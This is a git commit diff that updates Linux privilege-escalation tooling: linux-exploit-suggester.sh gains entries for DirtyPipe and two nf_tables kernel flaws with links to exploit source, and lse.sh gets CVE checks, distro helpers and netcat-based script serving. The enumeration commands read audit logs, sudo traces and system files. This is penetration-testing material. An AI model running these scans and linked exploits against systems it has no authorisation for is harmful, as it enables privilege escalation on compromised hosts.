Project Update
This commit is contained in:
parent
a86fff1b36
commit
80abe85b85
@ -79,14 +79,15 @@ class Crawler:
|
|||||||
self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl())
|
self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl())
|
||||||
|
|
||||||
def collect_urls(self, page):
|
def collect_urls(self, page):
|
||||||
soup = BeautifulSoup(page, "html.parser")
|
if not isinstance(page, BeautifulSoup):
|
||||||
|
page = BeautifulSoup(page, "html.parser")
|
||||||
|
|
||||||
urls = set()
|
urls = set()
|
||||||
attrs = ["src","href","action"]
|
attrs = ["src","href","action"]
|
||||||
tags = ["a","link","script","img","form"]
|
tags = ["a","link","script","img","form"]
|
||||||
|
|
||||||
for tag in tags:
|
for tag in tags:
|
||||||
for e in soup.find_all(tag):
|
for e in page.find_all(tag):
|
||||||
for attr in attrs:
|
for attr in attrs:
|
||||||
if e.has_attr(attr):
|
if e.has_attr(attr):
|
||||||
urls.add(e[attr])
|
urls.add(e[attr])
|
||||||
|
3866
linpeas.sh
3866
linpeas.sh
File diff suppressed because one or more lines are too long
@ -1,7 +1,7 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
#
|
#
|
||||||
# Copyright (c) 2016-2020, @_mzet_
|
# Copyright (c) 2016-2022, @_mzet_
|
||||||
#
|
#
|
||||||
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
|
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
|
||||||
# This is free software, and you are welcome to redistribute it
|
# This is free software, and you are welcome to redistribute it
|
||||||
@ -930,6 +930,44 @@ author: theflow (orginal exploit author); bcoles (author of exploit update at 'e
|
|||||||
EOF
|
EOF
|
||||||
)
|
)
|
||||||
|
|
||||||
|
EXPLOITS[((n++))]=$(cat <<EOF
|
||||||
|
Name: ${txtgrn}[CVE-2022-0847]${txtrst} DirtyPipe
|
||||||
|
Reqs: pkg=linux-kernel,ver>=5.8,ver<=5.16.11
|
||||||
|
Tags: ubuntu=(20.04|21.04),debian=11
|
||||||
|
Rank: 1
|
||||||
|
analysis-url: https://dirtypipe.cm4all.com/
|
||||||
|
src-url: https://haxx.in/files/dirtypipez.c
|
||||||
|
exploit-db: 50808
|
||||||
|
author: blasty (original exploit author: Max Kellermann)
|
||||||
|
EOF
|
||||||
|
)
|
||||||
|
|
||||||
|
EXPLOITS[((n++))]=$(cat <<EOF
|
||||||
|
Name: ${txtgrn}[CVE-2022-2586]${txtrst} nft_object UAF
|
||||||
|
Reqs: pkg=linux-kernel,ver>=3.16,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
|
||||||
|
Tags: ubuntu=(20.04){kernel:5.12.13}
|
||||||
|
Rank: 1
|
||||||
|
analysis-url: https://www.openwall.com/lists/oss-security/2022/08/29/5
|
||||||
|
src-url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
|
||||||
|
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
|
||||||
|
author: vulnerability discovery: Team Orca of Sea Security; Exploit author: Alejandro Guerrero
|
||||||
|
EOF
|
||||||
|
)
|
||||||
|
|
||||||
|
EXPLOITS[((n++))]=$(cat <<EOF
|
||||||
|
Name: ${txtgrn}[CVE-2022-32250]${txtrst} nft_object UAF (NFT_MSG_NEWSET)
|
||||||
|
Reqs: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
|
||||||
|
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
|
||||||
|
Rank: 1
|
||||||
|
analysis-url: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
|
||||||
|
analysis-url: https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
|
||||||
|
src-url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
|
||||||
|
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
|
||||||
|
author: vulnerability discovery: EDG Team from NCC Group; Author of this exploit: theori.io
|
||||||
|
EOF
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
############ USERSPACE EXPLOITS ###########################
|
############ USERSPACE EXPLOITS ###########################
|
||||||
n=0
|
n=0
|
||||||
|
|
||||||
@ -1769,7 +1807,7 @@ EOF
|
|||||||
FEATURES[((n++))]=$(cat <<EOF
|
FEATURES[((n++))]=$(cat <<EOF
|
||||||
feature: Syscalls filtering
|
feature: Syscalls filtering
|
||||||
available: CONFIG_SECCOMP=y
|
available: CONFIG_SECCOMP=y
|
||||||
enabled: cmd:grep -i Seccomp /proc/self/status | awk '{print \$2}'
|
enabled: cmd:grep -iw Seccomp /proc/self/status | awk '{print \$2}'
|
||||||
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
|
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
|
||||||
EOF
|
EOF
|
||||||
)
|
)
|
||||||
@ -2167,8 +2205,8 @@ for FEATURE in "${FEATURES[@]}"; do
|
|||||||
|
|
||||||
feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)
|
feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)
|
||||||
|
|
||||||
if [ -n "$cmdStdout" ]; then
|
if [ -n "$cmdStdout" ]; then
|
||||||
if [ "$cmdStdout" -eq 0 ]; then
|
if [ $cmdStdout -eq 0 ]; then
|
||||||
state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
|
state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
|
||||||
cmdStdout=""
|
cmdStdout=""
|
||||||
else
|
else
|
||||||
@ -2181,15 +2219,15 @@ for FEATURE in "${FEATURES[@]}"; do
|
|||||||
|
|
||||||
# for 3rd party (3) mode display "N/A" or "Enabled"
|
# for 3rd party (3) mode display "N/A" or "Enabled"
|
||||||
if [ $MODE -eq 3 ]; then
|
if [ $MODE -eq 3 ]; then
|
||||||
enabled="[ ${txtgrn}Enabled${txtrst} ]"
|
enabled="[ ${txtgrn}Enabled${txtrst} ]"
|
||||||
disabled="[ ${txtgray}N/A${txtrst} ]"
|
disabled="[ ${txtgray}N/A${txtrst} ]"
|
||||||
|
|
||||||
# for attack-surface (4) mode display "Locked" or "Exposed"
|
# for attack-surface (4) mode display "Locked" or "Exposed"
|
||||||
elif [ $MODE -eq 4 ]; then
|
elif [ $MODE -eq 4 ]; then
|
||||||
enabled="[ ${txtred}Exposed${txtrst} ]"
|
enabled="[ ${txtred}Exposed${txtrst} ]"
|
||||||
disabled="[ ${txtgrn}Locked${txtrst} ]"
|
disabled="[ ${txtgrn}Locked${txtrst} ]"
|
||||||
|
|
||||||
#other modes" "Disabled" / "Enabled"
|
# other modes" "Disabled" / "Enabled"
|
||||||
else
|
else
|
||||||
enabled="[ ${txtgrn}Enabled${txtrst} ]"
|
enabled="[ ${txtgrn}Enabled${txtrst} ]"
|
||||||
disabled="[ ${txtred}Disabled${txtrst} ]"
|
disabled="[ ${txtred}Disabled${txtrst} ]"
|
||||||
|
311
lse.sh
311
lse.sh
@ -1,15 +1,15 @@
|
|||||||
#!/bin/sh
|
#!/bin/sh
|
||||||
# shellcheck disable=1003,1091,2006,2016,2034,2039
|
# shellcheck disable=1003,1091,2006,2016,2034,2039,3043
|
||||||
# vim: set ts=2 sw=2 sts=2 et:
|
# vim: set ts=2 sw=2 sts=2 fdm=marker fmr=#(,#) et:
|
||||||
|
|
||||||
# Author: Diego Blanco <diego.blanco@treitos.com>
|
# Author: Diego Blanco <diego.blanco@treitos.com>
|
||||||
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
|
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
|
||||||
#
|
#
|
||||||
lse_version="3.10"
|
lse_version="4.10nw"
|
||||||
|
|
||||||
#( Colors
|
##( Colors
|
||||||
#
|
#
|
||||||
# fg
|
#( fg
|
||||||
red='\e[31m'
|
red='\e[31m'
|
||||||
lred='\e[91m'
|
lred='\e[91m'
|
||||||
green='\e[32m'
|
green='\e[32m'
|
||||||
@ -26,8 +26,8 @@ grey='\e[90m'
|
|||||||
lgrey='\e[37m'
|
lgrey='\e[37m'
|
||||||
white='\e[97m'
|
white='\e[97m'
|
||||||
black='\e[30m'
|
black='\e[30m'
|
||||||
#
|
##)
|
||||||
# bg
|
#( bg
|
||||||
b_red='\e[41m'
|
b_red='\e[41m'
|
||||||
b_lred='\e[101m'
|
b_lred='\e[101m'
|
||||||
b_green='\e[42m'
|
b_green='\e[42m'
|
||||||
@ -44,8 +44,8 @@ b_grey='\e[100m'
|
|||||||
b_lgrey='\e[47m'
|
b_lgrey='\e[47m'
|
||||||
b_white='\e[107m'
|
b_white='\e[107m'
|
||||||
b_black='\e[40m'
|
b_black='\e[40m'
|
||||||
#
|
##)
|
||||||
# special
|
#( special
|
||||||
reset='\e[0;0m'
|
reset='\e[0;0m'
|
||||||
bold='\e[01m'
|
bold='\e[01m'
|
||||||
italic='\e[03m'
|
italic='\e[03m'
|
||||||
@ -59,13 +59,13 @@ underline_off='\e[24m'
|
|||||||
inverse_off='\e[27m'
|
inverse_off='\e[27m'
|
||||||
conceil_off='\e[28m'
|
conceil_off='\e[28m'
|
||||||
crossedout_off='\e[29m'
|
crossedout_off='\e[29m'
|
||||||
|
##)
|
||||||
#)
|
#)
|
||||||
|
|
||||||
#( Globals
|
##( Globals
|
||||||
#
|
#
|
||||||
# user
|
# user
|
||||||
lse_user_id="$UID"
|
lse_user_id="`id -u`"
|
||||||
[ -z "$lse_user_id" ] && lse_user_id="`id -u`"
|
|
||||||
lse_user="$USER"
|
lse_user="$USER"
|
||||||
[ -z "$lse_user" ] && lse_user="`id -nu`"
|
[ -z "$lse_user" ] && lse_user="`id -nu`"
|
||||||
lse_pass=""
|
lse_pass=""
|
||||||
@ -77,7 +77,8 @@ lse_arch="`uname -m`"
|
|||||||
lse_linux="`uname -r`"
|
lse_linux="`uname -r`"
|
||||||
lse_hostname="`hostname`"
|
lse_hostname="`hostname`"
|
||||||
lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/Description:\s*//' 2>/dev/null`
|
lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/Description:\s*//' 2>/dev/null`
|
||||||
[ -z "$lse_distro" ] && lse_distro="`(source /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`"
|
[ -z "$lse_distro" ] && lse_distro="`(. /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`"
|
||||||
|
lse_distro_codename="" # retrieved below with lse_get_distro_codename
|
||||||
|
|
||||||
# lse
|
# lse
|
||||||
lse_passed_tests=""
|
lse_passed_tests=""
|
||||||
@ -85,11 +86,12 @@ lse_executed_tests=""
|
|||||||
lse_DEBUG=false
|
lse_DEBUG=false
|
||||||
lse_procmon_data=`mktemp`
|
lse_procmon_data=`mktemp`
|
||||||
lse_procmon_lock=`mktemp`
|
lse_procmon_lock=`mktemp`
|
||||||
|
lse_cve_tmp=''
|
||||||
|
|
||||||
# printf
|
# printf
|
||||||
printf "%s" "$reset" | grep -q '\\' && alias printf="env printf"
|
printf "%s" "$reset" | grep -q '\\' && alias printf="env printf"
|
||||||
|
|
||||||
# internal data
|
#( internal data
|
||||||
lse_common_setuid="
|
lse_common_setuid="
|
||||||
/bin/fusermount
|
/bin/fusermount
|
||||||
/bin/mount
|
/bin/mount
|
||||||
@ -176,12 +178,14 @@ lse_common_setuid="
|
|||||||
/usr/sbin/usernetctl
|
/usr/sbin/usernetctl
|
||||||
/usr/sbin/uuidd
|
/usr/sbin/uuidd
|
||||||
"
|
"
|
||||||
#regex rules for common setuid
|
#)
|
||||||
|
#( regex rules for common setuid
|
||||||
lse_common_setuid="$lse_common_setuid
|
lse_common_setuid="$lse_common_setuid
|
||||||
/snap/core.*
|
/snap/core.*
|
||||||
/var/tmp/mkinitramfs.*
|
/var/tmp/mkinitramfs.*
|
||||||
"
|
"
|
||||||
#critical writable files
|
#)
|
||||||
|
#( critical writable files
|
||||||
lse_critical_writable="
|
lse_critical_writable="
|
||||||
/etc/apache2/apache2.conf
|
/etc/apache2/apache2.conf
|
||||||
/etc/apache2/httpd.conf
|
/etc/apache2/httpd.conf
|
||||||
@ -235,8 +239,13 @@ lse_critical_writable_dirs="
|
|||||||
/root
|
/root
|
||||||
"
|
"
|
||||||
#)
|
#)
|
||||||
|
#( CVE list (populated by the lse packager)
|
||||||
|
lse_cve_list="
|
||||||
|
" #CVElistMARKER
|
||||||
|
#)
|
||||||
|
#)
|
||||||
|
|
||||||
#( Options
|
##( Options
|
||||||
lse_color=true
|
lse_color=true
|
||||||
lse_alt_color=false
|
lse_alt_color=false
|
||||||
lse_interactive=true
|
lse_interactive=true
|
||||||
@ -247,16 +256,16 @@ lse_find_opts='-path /proc -prune -o -path /sys -prune -o -path /dev -prune -o'
|
|||||||
lse_grep_opts='--color=always'
|
lse_grep_opts='--color=always'
|
||||||
#)
|
#)
|
||||||
|
|
||||||
#( Lib
|
##( Lib
|
||||||
cecho() {
|
cecho() { #(
|
||||||
if $lse_color; then
|
if $lse_color; then
|
||||||
printf "%b" "$@"
|
printf "%b" "$@"
|
||||||
else
|
else
|
||||||
# If color is disabled we remove it
|
# If color is disabled we remove it
|
||||||
printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g'
|
printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g'
|
||||||
fi
|
fi
|
||||||
}
|
} #)
|
||||||
lse_recolor() {
|
lse_recolor() { #(
|
||||||
o_white="$white"
|
o_white="$white"
|
||||||
o_lyellow="$lyellow"
|
o_lyellow="$lyellow"
|
||||||
o_grey="$grey"
|
o_grey="$grey"
|
||||||
@ -270,11 +279,11 @@ lse_recolor() {
|
|||||||
lred="$red"
|
lred="$red"
|
||||||
lgreen="$b_lgreen$black"
|
lgreen="$b_lgreen$black"
|
||||||
lcyan="$cyan"
|
lcyan="$cyan"
|
||||||
}
|
} #)
|
||||||
lse_error() {
|
lse_error() { #(
|
||||||
cecho "${red}ERROR: ${reset}$*\n" >&2
|
cecho "${red}ERROR: ${reset}$*\n" >&2
|
||||||
}
|
} #)
|
||||||
lse_exclude_paths() {
|
lse_exclude_paths() { #(
|
||||||
local IFS="
|
local IFS="
|
||||||
"
|
"
|
||||||
for p in `printf "%s" "$1" | tr ',' '\n'`; do
|
for p in `printf "%s" "$1" | tr ',' '\n'`; do
|
||||||
@ -282,8 +291,8 @@ lse_exclude_paths() {
|
|||||||
p="${p%%/}"
|
p="${p%%/}"
|
||||||
lse_find_opts="$lse_find_opts -path ${p} -prune -o"
|
lse_find_opts="$lse_find_opts -path ${p} -prune -o"
|
||||||
done
|
done
|
||||||
}
|
} #)
|
||||||
lse_set_level() {
|
lse_set_level() { #(
|
||||||
case "$1" in
|
case "$1" in
|
||||||
0|1|2)
|
0|1|2)
|
||||||
lse_level=$(($1))
|
lse_level=$(($1))
|
||||||
@ -293,8 +302,8 @@ lse_set_level() {
|
|||||||
exit 1
|
exit 1
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
}
|
} #)
|
||||||
lse_help() {
|
lse_help() { #(
|
||||||
echo "Use: $0 [options]"
|
echo "Use: $0 [options]"
|
||||||
echo
|
echo
|
||||||
echo " OPTIONS"
|
echo " OPTIONS"
|
||||||
@ -319,6 +328,7 @@ lse_help() {
|
|||||||
echo " pro: Processes related tests."
|
echo " pro: Processes related tests."
|
||||||
echo " sof: Software related tests."
|
echo " sof: Software related tests."
|
||||||
echo " ctn: Container (docker, lxc) related tests."
|
echo " ctn: Container (docker, lxc) related tests."
|
||||||
|
echo " cve: CVE related tests."
|
||||||
echo " Specific tests can be used with their IDs (i.e.: usr020,sud)"
|
echo " Specific tests can be used with their IDs (i.e.: usr020,sud)"
|
||||||
echo " -e PATHS Comma separated list of paths to exclude. This allows you"
|
echo " -e PATHS Comma separated list of paths to exclude. This allows you"
|
||||||
echo " to do faster scans at the cost of completeness"
|
echo " to do faster scans at the cost of completeness"
|
||||||
@ -326,8 +336,8 @@ lse_help() {
|
|||||||
echo " processes. A value of 0 will disable any watch (default: 60)"
|
echo " processes. A value of 0 will disable any watch (default: 60)"
|
||||||
echo " -S Serve the lse.sh script in this host so it can be retrieved"
|
echo " -S Serve the lse.sh script in this host so it can be retrieved"
|
||||||
echo " from a remote host."
|
echo " from a remote host."
|
||||||
}
|
} #)
|
||||||
lse_ask() {
|
lse_ask() { #(
|
||||||
local question="$1"
|
local question="$1"
|
||||||
# We use stderr to print the question
|
# We use stderr to print the question
|
||||||
cecho "${white}${question}: ${reset}" >&2
|
cecho "${white}${question}: ${reset}" >&2
|
||||||
@ -341,24 +351,24 @@ lse_ask() {
|
|||||||
return 1
|
return 1
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
}
|
} #)
|
||||||
lse_request_information() {
|
lse_request_information() { #(
|
||||||
if $lse_interactive; then
|
if $lse_interactive; then
|
||||||
cecho "${grey}---\n"
|
cecho "${grey}---\n"
|
||||||
[ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"`
|
[ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"`
|
||||||
lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"`
|
lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"`
|
||||||
cecho "${grey}---\n"
|
cecho "${grey}---\n"
|
||||||
fi
|
fi
|
||||||
}
|
} #)
|
||||||
lse_test_passed() {
|
lse_test_passed() { #(
|
||||||
# Checks if a test passed by ID
|
# Checks if a test passed by ID
|
||||||
local id="$1"
|
local id="$1"
|
||||||
for i in $lse_passed_tests; do
|
for i in $lse_passed_tests; do
|
||||||
[ "$i" = "$id" ] && return 0
|
[ "$i" = "$id" ] && return 0
|
||||||
done
|
done
|
||||||
return 1
|
return 1
|
||||||
}
|
} #)
|
||||||
lse_test() {
|
lse_test() { #(
|
||||||
# Test id
|
# Test id
|
||||||
local id="$1"
|
local id="$1"
|
||||||
# Minimum level required for this test to show its output
|
# Minimum level required for this test to show its output
|
||||||
@ -394,8 +404,8 @@ lse_test() {
|
|||||||
|
|
||||||
# Print name and line
|
# Print name and line
|
||||||
cecho "${white}[${l}${white}] ${grey}${id}${white} $name${grey}"
|
cecho "${white}[${l}${white}] ${grey}${id}${white} $name${grey}"
|
||||||
for i in $(seq $((${#name}+4)) 67); do
|
for i in $(seq $((${#id}+${#name}+10)) 79); do
|
||||||
echo -n "."
|
printf "."
|
||||||
done
|
done
|
||||||
|
|
||||||
# Check dependencies
|
# Check dependencies
|
||||||
@ -445,8 +455,8 @@ lse_test() {
|
|||||||
fi
|
fi
|
||||||
return 0
|
return 0
|
||||||
fi
|
fi
|
||||||
}
|
} #)
|
||||||
lse_show_info() {
|
lse_show_info() { #(
|
||||||
echo
|
echo
|
||||||
cecho "${lcyan} LSE Version:${reset} $lse_version\n"
|
cecho "${lcyan} LSE Version:${reset} $lse_version\n"
|
||||||
echo
|
echo
|
||||||
@ -470,12 +480,14 @@ lse_show_info() {
|
|||||||
fi
|
fi
|
||||||
cecho "${lblue}Architecture:${reset} $lse_arch\n"
|
cecho "${lblue}Architecture:${reset} $lse_arch\n"
|
||||||
echo
|
echo
|
||||||
}
|
cecho "${green}=====================(${yellow} Current Output Verbosity Level: ${cyan}$lse_level ${green})======================${reset}"
|
||||||
lse_serve() {
|
echo
|
||||||
|
} #)
|
||||||
|
lse_serve() { #(
|
||||||
# get port
|
# get port
|
||||||
which nc >/dev/null || lse_error "Could not find 'nc' netcat binary."
|
which nc >/dev/null || lse_error "Could not find 'nc' netcat binary."
|
||||||
|
|
||||||
local_ips="`ip a | grep -Eo 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2`"
|
local_ips="`ip a | grep -Eo "inet ([0-9]{1,3}\.){3}[0-9]{1,3}" | cut -d' ' -f2`"
|
||||||
|
|
||||||
# Get a valid and non used port
|
# Get a valid and non used port
|
||||||
port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'`
|
port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'`
|
||||||
@ -506,8 +518,8 @@ lse_serve() {
|
|||||||
done
|
done
|
||||||
# try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
|
# try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
|
||||||
nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
|
nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
|
||||||
}
|
} #)
|
||||||
lse_header() {
|
lse_header() { #(
|
||||||
local id="$1"
|
local id="$1"
|
||||||
shift
|
shift
|
||||||
local title="$*"
|
local title="$*"
|
||||||
@ -530,8 +542,8 @@ lse_header() {
|
|||||||
done
|
done
|
||||||
text="$text(${green} $title ${magenta})====="
|
text="$text(${green} $title ${magenta})====="
|
||||||
cecho "$text${reset}\n"
|
cecho "$text${reset}\n"
|
||||||
}
|
} #)
|
||||||
lse_exit() {
|
lse_exit() { #(
|
||||||
local ec=1
|
local ec=1
|
||||||
local text="\n${magenta}=================================="
|
local text="\n${magenta}=================================="
|
||||||
[ "$1" ] && ec=$1
|
[ "$1" ] && ec=$1
|
||||||
@ -539,18 +551,32 @@ lse_exit() {
|
|||||||
cecho "$text${reset}\n"
|
cecho "$text${reset}\n"
|
||||||
rm -f "$lse_procmon_data"
|
rm -f "$lse_procmon_data"
|
||||||
rm -f "$lse_procmon_lock"
|
rm -f "$lse_procmon_lock"
|
||||||
|
rm -f "$lse_cve_tmp"
|
||||||
exit "$ec"
|
exit "$ec"
|
||||||
}
|
} #)
|
||||||
lse_procmon() {
|
lse_procmon() { #(
|
||||||
# monitor processes
|
# monitor processes
|
||||||
#NOTE: The first number will be the number of occurrences of a process due to
|
#NOTE: The first number will be the number of occurrences of a process due to
|
||||||
# uniq -c
|
# uniq -c
|
||||||
|
local ps_args
|
||||||
|
local ps_busybox
|
||||||
|
if ps -V 2>&1 | grep -iq busybox; then
|
||||||
|
ps_args='-o pid,user,args'
|
||||||
|
ps_busybox=true
|
||||||
|
else
|
||||||
|
ps_args="-ewwwo start_time,pid,user:50,args"
|
||||||
|
ps_busybox=false
|
||||||
|
fi
|
||||||
while [ -f "$lse_procmon_lock" ]; do
|
while [ -f "$lse_procmon_lock" ]; do
|
||||||
ps -ewwwo start_time,pid,user:50,args
|
if $ps_busybox; then
|
||||||
|
ps $ps_args | sed 's/^\([0-9]*\)/? \1 /g'
|
||||||
|
else
|
||||||
|
ps $ps_args
|
||||||
|
fi
|
||||||
sleep 0.001
|
sleep 0.001
|
||||||
done | grep -v 'ewwwo start_time,pid,user:50,args' | sed 's/^ *//g' | tr -s '[:space:]' | grep -v "^START" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data"
|
done | grep -Ev "(pid,user|$lse_user *sed s/)" | sed 's/^ *//g' | tr -s '[:space:]' | grep -Ev "PID *USER *COMMAND" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data"
|
||||||
}
|
} #)
|
||||||
lse_proc_print() {
|
lse_proc_print() { #(
|
||||||
# Pretty prints output from lse_procmom received via stdin
|
# Pretty prints output from lse_procmom received via stdin
|
||||||
if $lse_color; then
|
if $lse_color; then
|
||||||
printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND"
|
printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND"
|
||||||
@ -574,7 +600,57 @@ lse_proc_print() {
|
|||||||
printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args"
|
printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args"
|
||||||
fi
|
fi
|
||||||
done
|
done
|
||||||
}
|
} #)
|
||||||
|
lse_get_distro_codename() { #(
|
||||||
|
# Get the distribution name
|
||||||
|
#
|
||||||
|
# ubuntu, debian, centos, redhat, opsuse, fedora, rocky
|
||||||
|
local distro="${grey}unknown${reset}"
|
||||||
|
if type lsb_release >/dev/null 2>&1; then
|
||||||
|
distro=`lsb_release -is`
|
||||||
|
elif [ -f /etc/os-release ]; then
|
||||||
|
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
|
||||||
|
echo "$distro" | grep -qi opensuse && distro=opsuse
|
||||||
|
elif [ -f /etc/redhat-release ]; then
|
||||||
|
grep -qi "centos" /etc/redhat-release && distro=centos
|
||||||
|
grep -qi "fedora" /etc/redhat-release && distro=fedora
|
||||||
|
grep -qi "red hat" /etc/redhat-release && distro=redhat
|
||||||
|
grep -qi "rocky" /etc/redhat-release && distro=rocky
|
||||||
|
fi
|
||||||
|
printf '%s' "$distro" | tr '[:upper:]' '[:lower:]' | tr -d \"\'
|
||||||
|
} #)
|
||||||
|
lse_is_version_bigger() { #(
|
||||||
|
# check if version v1 is bigger than v2
|
||||||
|
local v1="$1"; local v2="$2" ; local vc
|
||||||
|
[ "$v1" = "$v2" ] && return 1 # equal is not bigger
|
||||||
|
vc="`printf "%s\n%s\n" "$v1" "$v2" | sort -rV | head -n1`"
|
||||||
|
[ "$v1" = "$vc" ] && return 0
|
||||||
|
return 1
|
||||||
|
} #)
|
||||||
|
lse_get_pkg_version() { #(
|
||||||
|
# get package version depending on distro
|
||||||
|
# returns 2 if distro is unknown
|
||||||
|
# returns 1 if package is not installed (or doesn't exist)
|
||||||
|
# returns 0 on success, and prints out the package version
|
||||||
|
pkg_name="$1"
|
||||||
|
case "$lse_distro_codename" in
|
||||||
|
debian|ubuntu)
|
||||||
|
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
|
||||||
|
;;
|
||||||
|
centos|redhat|fedora|opsuse|rocky|amzn)
|
||||||
|
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
|
||||||
|
pkg_version="${pkg_version##"$pkg_name"-}"
|
||||||
|
pkg_version=`echo "$pkg_version" | sed -E 's/\.(aarch64|armv7hl|i686|noarch|ppc64le|s390x|x86_64)$//'`
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
return 2
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
[ -z "$pkg_version" ] && return 1
|
||||||
|
printf "%s" "$pkg_version"
|
||||||
|
return 0
|
||||||
|
} #)
|
||||||
|
#)
|
||||||
#)
|
#)
|
||||||
|
|
||||||
########################################################################( TESTS
|
########################################################################( TESTS
|
||||||
@ -638,7 +714,7 @@ lse_run_tests_users() {
|
|||||||
'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \
|
'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \
|
||||||
"usr070"
|
"usr070"
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
#########################################################################( sudo
|
#########################################################################( sudo
|
||||||
lse_run_tests_sudo() {
|
lse_run_tests_sudo() {
|
||||||
@ -688,7 +764,7 @@ lse_run_tests_sudo() {
|
|||||||
"Do we know if any other users used sudo?" \
|
"Do we know if any other users used sudo?" \
|
||||||
'for uh in $(cut -d: -f1,6 /etc/passwd); do [ -f "${uh##*:}/.sudo_as_admin_successful" ] && echo "${uh%%:*}"; done'
|
'for uh in $(cut -d: -f1,6 /etc/passwd); do [ -f "${uh##*:}/.sudo_as_admin_successful" ] && echo "${uh%%:*}"; done'
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
##################################################################( file system
|
##################################################################( file system
|
||||||
lse_run_tests_filesystem() {
|
lse_run_tests_filesystem() {
|
||||||
@ -851,7 +927,7 @@ lse_run_tests_filesystem() {
|
|||||||
"Dump fstab file" \
|
"Dump fstab file" \
|
||||||
'cat /etc/fstab'
|
'cat /etc/fstab'
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
#######################################################################( system
|
#######################################################################( system
|
||||||
lse_run_tests_system() {
|
lse_run_tests_system() {
|
||||||
@ -907,7 +983,7 @@ lse_run_tests_system() {
|
|||||||
"System password policies in /etc/login.defs" \
|
"System password policies in /etc/login.defs" \
|
||||||
'grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs'
|
'grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs'
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
#####################################################################( security
|
#####################################################################( security
|
||||||
lse_run_tests_security() {
|
lse_run_tests_security() {
|
||||||
@ -953,7 +1029,7 @@ lse_run_tests_security() {
|
|||||||
"Can we read the auditd log?" \
|
"Can we read the auditd log?" \
|
||||||
'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"'
|
'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"'
|
||||||
}
|
}
|
||||||
|
#)
|
